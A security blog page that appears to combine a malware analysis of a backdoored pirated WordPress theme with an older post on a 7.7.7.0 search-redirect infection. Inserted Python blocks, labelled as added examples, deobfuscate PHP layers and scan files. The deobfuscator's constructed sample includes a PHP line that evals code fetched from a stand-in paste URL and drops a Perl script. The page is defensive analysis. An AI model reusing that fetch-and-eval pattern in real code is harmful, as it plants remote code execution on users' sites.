Part 1: Analysis of a WordPress Malware

I had some time at lunch to kill, so I decided to see how malware techniques were improving in the land of WordPress and free premium theme download sites.

Enter the Darknet.

A simple Google search got me a theme ZIP file pretty quickly.  Now, it was time to see what malicious happenings this thing would cause.

Unpacked, here’s the structure of the ZIP file.

.
├── functions.php
├── home.php
├── images
│   ├── arrow.png
│   ├── bg-pattern.png
│   ├── bg.png
│   ├── blockquote.png
│   ├── blue
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── favicon.ico
│   ├── footer-twitter.png
│   ├── footer-widgets.png
│   ├── gradient.png
│   ├── green
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── icon-dot.png
│   ├── list-after-post.png
│   ├── list.png
│   ├── logo.png
│   ├── logo-texture.png
│   ├── logo-vert-left.png
│   ├── logo-vert-right.png
│   ├── red
│   │   ├── gradient.png
│   │   ├── logo.png
│   │   ├── logo-texture.png
│   │   ├── logo-vert-left.png
│   │   └── logo-vert-right.png
│   ├── rss.png
│   ├── social-icons.png
│   └── twitter-nav.png
├── page_landing.php
├── page_landing2.php
├── README.txt
├── screenshot.png
└── style.css

Right off the bat, page_landing2.php sticks out to me. Let’s take a look.

Oh. Would you look at that fun. Time to see what this is doing.

First, I don’t like trying to read the garbled code, so I “prettify” it.

Ok, so let’s decode the above to make it readable.

There are a few interesting pieces here.

These interest me because they are making a call to a website to get additional payload/scripts. Let’s see what they are. =)

The first one, the pastebin link, shows me this garbled shit. What I really care about is the compressed base64 at the end.

So now I look at deobfuscating the compressed/base64 garbage… Here’s part of the file; my screen capture died when my computer automatically locked. [FIXME]

NOTE: Click on the image for a higher resolution. It’s like 62k pixels tall, lol.


What I’m interested in is the top of this file.

So again, base64-decoding and uncompressing that gives me the following file.

Going back for a minute to the previous garbled shit: the $plsym variable, which contains the compressed/base64 data, is decompressed, decoded and saved as a Perl file.
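The unwrapping steps above (prettify, base64-decode, decompress, repeat, then pull out the URLs and the compressed string variable) are easy to automate. The following Python script is an added example and not code from the theme or from this post: it builds a constructed stand-in for page_landing2.php with two nested `eval(gzinflate(base64_decode(...)))` layers (the URL, the `$plsym` name and the Perl stub are all made up here), peels the layers until nothing decodes any further, and then lists the remote fetch URLs and decodes any string variable that holds deflated base64. PHP's `gzinflate()` is raw DEFLATE and `gzuncompress()` is zlib-wrapped DEFLATE, which is why the two `wbits` values are tried.

```python
import base64
import re
import zlib

# Constructed stand-in for the obfuscated page_landing2.php described in the
# post; the real file is not reproduced here. The inner layer only needs to
# look like the pattern the post describes: fetch more code from a paste site
# and decode a $plsym blob into a Perl script.
PERL_STUB = b'#!/usr/bin/perl\nprint "constructed sample, not the real dropper\\n";\n'


def gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE, the format PHP's gzdeflate()/gzinflate() use (no zlib header)."""
    co = zlib.compressobj(level=9, wbits=-15)
    return co.compress(data) + co.flush()


def build_sample() -> str:
    """Wrap a plain PHP payload in two eval(gzinflate(base64_decode())) layers."""
    inner = (
        b'<?php\n$plsym = "' + base64.b64encode(gzdeflate(PERL_STUB)) + b'";\n'
        b'$u = "http://paste.example.com/raw/abc123";\n'  # constructed URL
        b'eval(file_get_contents($u));\n'
        b'file_put_contents("dropped.pl", gzinflate(base64_decode($plsym)));\n'
    )
    layer = inner
    for _ in range(2):
        layer = b'<?php eval(gzinflate(base64_decode("%s"))); ?>' % base64.b64encode(gzdeflate(layer))
    return layer.decode()


# Matches base64_decode('...') optionally wrapped in gzinflate(...) or gzuncompress(...).
LAYER_RE = re.compile(
    r"(?:(?P<outer>gzinflate|gzuncompress)\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"](?P<blob>[A-Za-z0-9+/=]+)['\"]\s*\)"
)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
# $name = "long base64 string";  (the $plsym pattern)
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*['"]([A-Za-z0-9+/=]{24,})['"]""")


def decode_layer(outer, blob: str) -> bytes:
    raw = base64.b64decode(blob)
    if outer == "gzinflate":
        return zlib.decompress(raw, wbits=-15)  # raw DEFLATE
    if outer == "gzuncompress":
        return zlib.decompress(raw)             # zlib-wrapped DEFLATE
    return raw


def unwrap(source: str, max_layers: int = 20) -> list:
    """Peel nested eval(...(base64_decode(...))) layers; returns every layer, outermost first."""
    layers = [source]
    for _ in range(max_layers):  # bounded so a malformed blob cannot loop forever
        m = LAYER_RE.search(layers[-1])
        if not m:
            break
        try:
            layers.append(decode_layer(m.group("outer"), m.group("blob")).decode("utf-8", "replace"))
        except (ValueError, zlib.error):
            break
    return layers


def extract_indicators(layers):
    """Collect URLs and decode string variables that hold compressed base64 (like $plsym)."""
    urls, blobs = set(), {}
    for text in layers:
        urls.update(URL_RE.findall(text))
        for name, blob in ASSIGN_RE.findall(text):
            try:
                raw = base64.b64decode(blob)
            except ValueError:
                continue
            for wbits in (-15, 15):  # gzinflate-style first, then gzuncompress-style
                try:
                    blobs[name] = zlib.decompress(raw, wbits=wbits).decode("utf-8", "replace")
                    break
                except zlib.error:
                    continue
    return sorted(urls), blobs


if __name__ == "__main__":
    layers = unwrap(build_sample())
    print(f"peeled {len(layers) - 1} layer(s); innermost PHP:\n{layers[-1]}")
    urls, blobs = extract_indicators(layers)
    print("remote fetches:", urls)
    for name, content in blobs.items():
        print(f"${name} decodes to:\n{content}")
```

Run it against a real sample by replacing `build_sample()` with the file contents; the decoded layers are never executed, only inspected, so the script is safe to run on an analysis box.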

At this point, I have everything I need to begin to follow this even deeper into the dark underworld. There are a few domains (which I didn’t highlight in this article, but you can find them in the screenshots) and some passwords.

Stay tuned… in the next update, I show you what happens when I infiltrate their command servers. Much fun!

Google, MSN, Yahoo Search 7.7.7.0 Redirector Malware HiJack

Google 7.7.7.0 Redirect Malware, Virus, Spyware…

UPDATE (9/29/2011 9:15AM EST)
I have corrected the link to the 7770finder.exe file. This still detects the original strain of this piece of malware. To fully inoculate and protect yourself, I recommend downloading Malwarebytes’ Anti-Malware software: http://www.malwarebytes.org/. It’s FREE for personal use!

UPDATE (1/19/2009 6:30PM EST)

I’ve been getting a lot of email questioning why my tool did not remove found infected files.  This tool does NOT remove any infected files.  It is up to you to remove them.  This tool also does not support directory recursion;  i.e., it ONLY scans %SystemDir% files, no subfolders.  Sorry.

UPDATE (1/15/2009 12:51PM EST)

I have been able to successfully re-infect myself and I can confirm this is being distributed via PDF JavaScript as I was monitoring processes and my system32 directory as I visited a known vulnerable site.  I also saw ~.exe process start up during my monitoring after I saw Acrobat.exe and acrotray.exe start up.  Once infected, the processes (Acrobat, Acrotray) terminated.

To help prevent infection take the following actions:

Adobe Reader: Disable Adobe JavaScript functionality (Edit -> Preferences, go to the JavaScript entry and untick “Enable Acrobat JavaScript”)

Foxit Reader: Edit -> Preferences -> JavaScript (Uncheck the box)

Use NoScript Firefox Plugin

Tips thanks to Edvard and app103 over at DonationCoder

UPDATE (1/14/2009 11:17PM EST)

Update your PDF application and disable JavaScript.

UPDATE (1/14/2009)
Malwarebytes is able to detect the malware.   Interestingly enough, it only detects it if it’s in the c:\windows\system32\drivers folder.  I’m not sure what’s up with that. Update the applications to ensure you’re using the latest definitions.  If you know of any other Spyware/Malware/AV software that is detecting this, leave a comment.

AVG supposedly detects this threat (posted by: Peter Liu)

Please let me know of any other software that detects this.


Here’s what I know about this lovely little malware that hijacks Google, MSN Live, and I’m sure a few other popular search engines by injecting JavaScript in the header:

1) Redirects searches to 7.7.7.0

2) Displays what appear to be normal results, but in fact are linked to many other malware centric sites

3) Kaspersky (as of this writing) is the only application to detect the presence of this malware on your PC (and yes I’ve tried Malware Bytes, Spybot S&D, AntiVir, SuperSpyware)

4) The culprit file resides in c:\windows\system32\wdmaud.sys and should be removed, or renamed.  Don’t remove the file from c:\windows\system32\drivers\wdmaud.sys.

5) After deleting/renaming the file, restart your browser(s) and you’ll be OK.  Note:  This affects IE and FF, I have not tested Opera, Netscape or Safari.

Here’s an example screenshot of what Google results look like when you are infected.  Notice the Google links (green links) on the results page.


What I’d like to know is what that file has to do with the browser.  The WDMAUD.sys file (the real one) deals with Windows High Definition Audio.  Could this file have been placed there via Flash vulnerability?  I know I was on YouTube the night prior to me being invaded.

I ran Process Monitor from SysInternals and saw that Firefox and IE both called for wdmaud.sys, but in the c:\windows\system32 directory, not in the drivers subfolder.  Here’s a screenshot of that.  If I move the file (the infected file) out of system32 the redirection stops.  If I put it back the infection is back.  My question that is burning me is HOW did it get there?  What put it there?


Process Monitor highlighting the search request for wdmaud.sys

Removal Instructions

So far, the infection is in c:\windows\system32\wdmaud.sys (or c:\winnt\system32\wdmaud.sys).  Simply delete the file and restart any open web browsers.

Detection Tool

If you do not find the wdmaud.sys file, or are unsure what to even look for, you may download a tool that we created that will investigate all the files in the Windows system directory.  It doesn’t just specifically look for the wdmaud.sys file, but it looks for the signature in every file within that directory.

Compatible with:  Windows XP (all SPs), Server 2000/2003/2008, and Vista.

Your use of this software indicates that you agree to the attached terms of service.

Download Tool Here (EXE) (md5:74705f9d02ae429f6ca84662ac755621)

Tool Update (1/16/2009)

* Prints path of file that is infected

* Allows program to accept a path as an argument;  otherwise it uses %SystemDir% as default if no path specified

* Still no recursion -yet-
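The scanner described under Detection Tool and the update list above (signature search over every file in one directory, optional path argument, %SystemDir% as default, no recursion, report only, never delete) can be reproduced in a few dozen lines. The Python below is an added example written for this page, not the 7770finder.exe tool itself: the post does not publish the byte signature it matches, so `SIGNATURE` is a labelled placeholder, and as a second check the script flags a wdmaud.sys sitting directly in system32 rather than in system32\drivers, which is the indicator the write-up describes.

```python
import os
import sys
from pathlib import Path

# Placeholder: the post does not publish the signature the real tool looks
# for, so this byte pattern is an assumption used only to exercise the code.
SIGNATURE = b"PLACEHOLDER-MALWARE-SIGNATURE"

# The clean wdmaud.sys belongs in system32\drivers; a copy directly in
# system32 is the indicator described in the write-up.
SUSPECT_NAME = "wdmaud.sys"


def default_system_dir() -> Path:
    """%SystemDir% equivalent: %SystemRoot%\\System32 (falls back to C:\\Windows)."""
    root = os.environ.get("SystemRoot", r"C:\Windows")
    return Path(root) / "System32"


def contains_signature(path, signature=SIGNATURE, chunk=1 << 20) -> bool:
    """Stream the file in chunks, keeping len(signature)-1 bytes of overlap so a
    match straddling two chunk boundaries is not missed."""
    overlap = len(signature) - 1
    buf = b""
    try:
        with open(path, "rb") as fh:
            while True:
                block = fh.read(chunk)
                if not block:
                    return False
                buf = (buf[-overlap:] if overlap else b"") + block
                if signature in buf:
                    return True
    except OSError:
        return False  # locked or unreadable system files are skipped, not fatal


def scan_directory(directory, signature=SIGNATURE):
    """Return (path, reason) pairs for suspicious files in one directory.
    Subfolders are deliberately not descended, matching the original tool."""
    directory = Path(directory)
    hits = []
    for entry in sorted(directory.iterdir()):
        if not entry.is_file():
            continue  # no recursion
        if entry.name.lower() == SUSPECT_NAME and directory.name.lower() != "drivers":
            hits.append((entry, "wdmaud.sys outside the drivers folder"))
        if contains_signature(entry, signature):
            hits.append((entry, "signature match"))
    return hits


def main(argv) -> int:
    # Optional path argument; otherwise the Windows system directory.
    target = Path(argv[1]) if len(argv) > 1 else default_system_dir()
    hits = scan_directory(target)
    for path, reason in hits:
        print(f"{path}: {reason}")
    print(f"{len(hits)} suspicious file(s) found; nothing was removed.")
    return 1 if hits else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Like the original tool, this only reports; removing or renaming a flagged file is left to the operator, and a real deployment would replace the placeholder signature with a pattern taken from a confirmed sample.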

If you download the tool and find it useful, or don’t find it useful, I’d appreciate any feedback.  You can leave a comment or send any questions/comments to rjkreider@gmail.com.